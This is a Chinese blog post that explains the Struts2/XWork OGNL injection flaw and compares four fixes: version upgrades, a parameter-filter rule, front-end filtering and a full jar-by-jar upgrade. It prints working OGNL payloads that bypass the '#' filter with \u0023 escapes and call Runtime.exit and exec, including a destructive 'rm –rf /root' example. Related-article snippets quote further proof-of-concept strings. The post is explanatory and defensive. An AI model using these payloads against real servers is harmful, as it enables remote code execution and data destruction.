OGNL漏洞原理与解决方案

最新推荐文章于 2025-09-07 15:28:19 发布
原创 最新推荐文章于 2025-09-07 15:28:19 发布 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web渗透 #owasp top 10

本文详细介绍了OGNL漏洞的原理,指出Struts2框架如何处理HTTP参数,以及攻击者如何利用Unicode转义字符绕过限制执行任意代码。提出了四种解决方案,包括升级Struts2版本、参数过滤、前端拦截和全面升级,并分析了各方案的优缺点。建议采用全面升级至Struts2.3.24,并结合其他防御措施确保安全性。

一,漏洞存在的地方和原理

Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: 

Java代码  

  1. ?user.address.city=Bishkek&user['favoriteDrink']=kumys  

ONGL将它转换为: 

Java代码  

  1. action.getUser().getAddress().setCity("Bishkek")   
  2. action.getUser().setFavoriteDrink("kumys")  

这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。 
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: 
此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击 

Java代码  

  1. ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1  

转义后是这样: 

Java代码  

  1. ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1  


OGNL处理时最终的结果就是

Java代码  

  1. java.lang.Runtime.getRuntime().exit(1);  

类似的可以执行

Java代码  

  1. java.lang.Runtime.getRuntime().exec("rm –rf /root")  

,只要有权限就可以删除任何一个目录。 

 

https://example.com/xx.action?XXParam=#%20context'xwork.MethodAccessor.denyMethodExecution'l=false,#-memberAccess.allowPrivateAccess=true,#result=@java.lang.Runtime@getRuntime.exec('calc.exe')这里攻击者通过XXParam传入OGNL表达式,被服务器解析,执行Java语言代码,修改xwork.MethodAccessor.denyMethodExecution属性的值为false修改_memberAccess.allowPrivateAccess的属性的值为true ,并执行java.lang.Runtime.getRuntime().exec('calc.exe")命令调用。

设置struts.ognl.allowStaticMethodAccess为false,设置_memberAccess.allowPrivateAccess为false ,设置
xwork.MethodAccessor.denyMethodExecution为true ,并采用白名单策略对用户输入的OGNL表达式进行过滤。

二,消除的方法是

大概有四种解决方案,方案如下。建议使用第四中方案。
  1.升级到struts2.2版本。
  这个可以避免这个问题,经测试发现新版本虽然解决了上述的漏洞,但是新的问题是strus标签出问题了。

<s:bean id="Test" name="cn.com.Test"></s:bean>   
<s:property value="#Test.getType().get(cType.toString())" /> 
  这样的标签在struts2.0中是可以使用的,但是新版中就不解析了,原因就是“#”的问题导致的,补了漏洞,正常的使用也用不了了。
所以sebug网站上的建议升级到2.2版本是不可行的。

  2.struts参数过滤。

<interceptor-ref name="params">   
<param name="excludeParams">.*\\u0023.*</param>   
</interceptor-ref>  
  这个可以解决漏洞问题,缺点是工作量大,每个项目都得改struts配置文件。如果项目里,是引用的一个类似global.xml的配置文件,工作量相应减少一些。

  3.在前端请求进行过滤。
  比如在ngnix,apache进行拦截,参数中带有\u0023的一律视为攻击,跳转到404页面或者别的什么页面。这样做的一个前提就是没人把#号转码后作为参数传递。
  请求如果是get方式,可以进行过滤,如果是post方式就过滤不到了,所以还是应该修改配置文件或更新新的jar包。
 
  4、全面升级。struts2.1.8.1升级至2.3.24  

1、新增JAR包:commons-lang3-3.2.jar 和 javassist-3.11.0.GA.jar
2、替换JAR包:
commons-fileupload-1.2.1.jar —->commons-fileupload-1.3.1.jar
commons-io-1.3.2.jar —–>commons-io-2.2.jar
freemarker-2.3.15.jar —->freemarker-2.3.22.jar
ognl-2.7.3.jar —-> ognl-3.0.6.jar
struts2-core-2.1.8.1.jar —-> struts2-core-2.3.24.jar
xwork-core-2.1.6.jar —–> xwork-core-2.3.24.jar
3、保留原有的commons-lang.jar,org.apache.commons.lang.StringUtils类被org.apache.commons.lang3.StringUtils替换了
4、修改web.xml, 将org.apache.struts2.dispatcher.FilterDispatcher 改为 org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter


 

OGNL漏洞原理全解
MachinegunJoe777的博客
09-13 239
说到OGNL,可能很多师傅都会想到struts2,在Struts2漏洞分析的道路上,可能在学习的过程中浅尝而止,也或许挨着分析了一遍,但是每次都是停到了setValue或者getValue这里,本篇将和大家分享,setValue和getValue中详细的内容,揭开Struts2最后一层纱,看完本篇后,希望可以对整个系列,包括并不限于Struts漏洞系列有一个更深的了解。知识浅薄,往各位大佬留情。
OGNL表达式注入修复方法总结
zqmattack的博客
07-05 935
OGNL表达式注入是Java框架(如Struts2)中的高危漏洞,攻击者通过恶意输入执行任意代码,可能导致RCE或数据泄露。漏洞成因在于用户输入未经过滤直接传入OGNL解析器,或框架动态解析表达式时存在缺陷。防护措施包括:严格输入过滤(白名单验证)、禁用动态表达式执行、使用类型安全参数绑定、及时升级框架版本、配置OGNL安全沙箱。Struts2用户应特别注意禁用静态方法访问等安全配置,并避免直接拼接用户输入到表达式。检测时可使用OWASP ZAP等工具进行扫描,关键是要建立多层防御机制。
漏洞预警】Atlassian 修复了Confluence的0DAY漏洞OGNL注入漏洞 CVE-2022-26134):无需要身份验证的远程代码执行漏洞
信息安全-企业安全-数据安全
06-05 869
知名软件厂商Atlassian发布了安全更新,用于修复Confluence 和 数据中心的一个关键的0Day漏洞,此漏洞正在被黑客疯狂的攻击暴露在互联网的服务器。
Struts2漏洞浅析之Ongl代码执行分析
weixin_34013044的博客
07-22 321
一、简述2010年7月exploitdb爆出的《Struts2/XWork<2.2.0RemoteCommandExecutionVulnerability》,可以称之为神一样的漏洞,***者只要构造出合适的语句,就有很大的几率获得系统权限(System或者root,因为tomcat默认都会以这样的权限运行),而且时至今日存在这个漏洞的网站仍然大有存在。本文...
ognl概念和原理详解
黑马蓝梦的专栏
05-12 8147
引言:众所周知,在mvc中,数据是在各个层次之间进行流转是一个不争的事实。而这种流转,也就会面临一些困境,这些困境,是由于数据在不同世界中的表现形式不同而造成的:   1. 数据在页面上是一个扁平的,不带数据类型的字符串,无论你的数据结构有多复杂,数据类型有多丰富,到了展示的时候,全都一视同仁的成为字符串在页面上展现出来。   2. 数据在Java世界中可以表现为丰富的数据结构和数据类型,你可
简析struts2漏洞CVE-2017-5638,S02-45 (形成原理,解决方法)
roberts939299的专栏
03-14 9321
简单说一下Struts2基于“commons-fileupload”组件实现文件上传的漏洞漏洞编号CVE-2017-5638,S02-45. 1. 漏洞重现:      通过发包模拟器或其它你能修改请求头Content-Type字段的客户端,可以把 Content-Type 修改成诸如haha~multipart/form-data %{#_memberAccess=@ognl.OgnlCo
OGNL官方文档:语言指南开发指南
它涵盖了OGNL的API使用方法、主流Java框架的集成方式、性能优化技巧以及常见问题的解决方案。该指南还介绍了如何自定义OGNL的行为,如扩展属性访问器、实现类型转换器、配置安全策略等高级主题。 在实际应用中,...
49、Java Web 漏洞利用 AWD 竞赛准备全解析
最新发布
nept的博客
09-07 129
本文全面解析了Java Web漏洞利用AWD竞赛准备的关键要点。内容涵盖Java代码审计中的OGNL表达式注入、JNDI注入原理实践,以及反序列化利用工具如ysoserial的使用。同时,详细介绍了AWD竞赛的准备工作、漏洞利用防御技巧,包括自动化脚本开发、流量分析混淆策略。旨在帮助网络安全爱好者提升实战能力,为竞赛和实际工作提供技术支撑。
Struts2中的URL重写后缀移除解决方案
Struts2通过定义Struts2配置文件(struts.xml)来管理应用中的动作(Action),并使用OGNL(Object-Graph Navigation Language)表达式语言来访问和操作数据。 #### 2. URL重写后缀去除 在Web开发中,URL重写是...
OGNL设计及使用不当造成的远程代码执行漏洞
weixin_34061555的博客
03-08 598
紫气东来 · 2013/07/19 14:48我们可以把OGNL作为一个底层产品,它在功能实现中的设计缺陷,是如何能够被利用并远程执行恶意代码的,而不是完全在struts2这个产品的功能设计层面去讨论漏洞原由!什么是OGNL?OGNL是Object-Graph Navigation Language的缩写,它是一种功能强大的表达式语言(Expression Language,简称为EL),通过它简...
XWork绕过安全限制执行任意命令漏洞补丁
08-20
CVE ID: CVE-2010-1870 XWork是一个命令模式框架,用于支持Struts 2及其他应用。 XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。 Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将: user.address.city=Bishkek&user['favoriteDrink']=kumys 转换为: action.getUser().getAddress().setCity("Bishkek") action.getUser().setFavoriteDrink("kumys") 这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。 除了获取和设置属性外,OGNL还支持其他一些功能: * 方法调用:foo() * 静态方式调用: @java.lang.System@exit(1) * 构建函数调用:new MyClass() * 处理上下文变量:#foo = new MyClass() 由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行: * OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true) * SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false) 为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量: * #application * #session * #request * #parameters * #attr * #context * #_memberAccess * #root * #this * #_typeResolver * #_classResolver * #_traceEvaluations * #_lastEvaluation * #_keepLastEvaluation 这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED')
CVE Struts2 s2-062 ONGL漏洞复现
8888的博客
06-14 970
{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行,他会自动计算结果,并把结果自动赋值给Struts的标签的地方,我们可以再试一下,我们将6*6改为 9*9。然而,值得注意的是,Struts2在某些版本中存在远程代码执行漏洞,因此在使用Struts2进行开发时,需要确保使用最新的、已经修复漏洞的版本,并采取必要的安全措施来保护应用程序的安全性。项目使用了%{}解析OGNL表达式,对用户输入 的内容进行二次解析的时候,如果没有验证, 可能导致远程代码执行。
struts2 057 OGNL的远程代码执行漏洞复现
weixin_45291045的博客
02-13 658
访问:http://www.xxx.cn:81/struts2-showcase 漏洞验证 访问 /struts2-showcase/${(111+111)}/actionChain1.action 回车 变成了/struts2-showcase/222/register2.action 111+111执行了证明存在struts2-057漏洞 命令执行poc /index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28
struts2 ongl漏洞解决方案
familyGo的专栏
08-14 652
采用比较简单的过滤器方式拦截掉攻击代码。 以下为解决方式: 过滤器代码: package org.openxtiger.filter; import java.io.IOException; import javax.servlet.Filter; import ja
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
热爱学习,喜欢折腾!
10-09 2333
Confluence是一个专业的企业知识管理协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134,漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。
关于OGNL的一些总结
gm19940402的博客
11-14 334
简介 OGNL是一个开源项目。它的存在就是为了取代页面中的java脚本,简化数据的访问。 OGNL三要素 1.表达式 2.上下文 3.根对象(ROOT对象) 理解 OGNL表达式是围绕**OGNL上下文**进行的;OGNL实际上是一个Map对象,属于ognl.OgnlContext类,在它里面可以存放多个JavaBean对象。而上下文中会存在一个根对象,访问根对象可以直接通过名称或者属性访...
详述近期遭利用的 Atlassian Confluence OGNL 注入漏洞 (CVE-2021-26084)
smellycat000的专栏
10-14 2632
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士趋势科技公司的研究团队详述了CVE-2021-26084 的根因。Atlassian Confluence Server and Dat...
struts2OGNL攻击漏洞解决记录
城之残垣的专栏
04-28 1233
http://struts.apache.org/development/2.x/docs/s2-005.html 在struts的配置文件中的基类过滤拦截器加上 "params"> "excludeParams">dojo\..*,^struts\..*,.*\\.*,.*\(.*,.*\).*,.*@.* 进行控制
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值